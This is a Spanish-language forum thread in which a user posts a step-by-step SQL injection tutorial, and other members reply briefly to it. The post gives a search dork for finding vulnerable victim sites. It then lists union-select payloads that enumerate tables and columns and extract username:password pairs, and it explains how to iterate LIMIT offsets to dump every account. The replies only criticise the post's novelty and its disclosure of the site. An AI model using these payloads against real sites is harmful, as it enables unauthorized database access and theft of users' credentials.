Saludos a todos. Soy ruben_linux, voy enseñar como hago SQLi
1.- buscamos victima.
inurl:software/categoria.php?
2.- exploit
+and+1=0
3.- buscamos union select
Citarhttp://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+1--
4.- buscamos las tablas
Citarhttp://www.xxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(table_name),0x2C,0x3C62723E)+from+information_schema.tables--
5.- buscamos las columnas
Citarhttp://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(column_name),0x2C,0x3C62723E)+from+information_schema.columns--
6.- le pedimos que nos muestre el nick y la pass de la tabla usuarios.
Citarhttp://www.xxxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+concat_ws(char(58),nick,PASSWORD)+from+usuarios+limit+0,1--
vamos cambiando en limit+0,1-- por (1,1) (2,1) (3,1) y nos va dando los demas pares de user:pass
podemos buscar más tablas, y más columnas, aquí solo muestro una pantalla pero se pueden sacar más.
[youtube=425,350]http://www.youtube.com/watch?v=uuEbGos9Cwg[/youtube]
1. No tiene nada de nuevo.
2. No creo que sea necesario ponerle el hosting.
3. ...
Interesante.. pero dejame decirte que creo que no está permitido publicar la web vulnerable cuando se hacen este tipo de cosas.
De todos modos, no es que esté muy explicado que digamos =/
A mi ya con el titulo del vídeo.... "vulneravilidad" ya me sorprendió. ;-)
Cita de: WarGhost en 26 Agosto 2011, 02:54 AM
A mi ya con el titulo del vídeo.... "vulneravilidad" ya me sorprendió. ;-)
Gracias WarGhost. Ya lo cambie.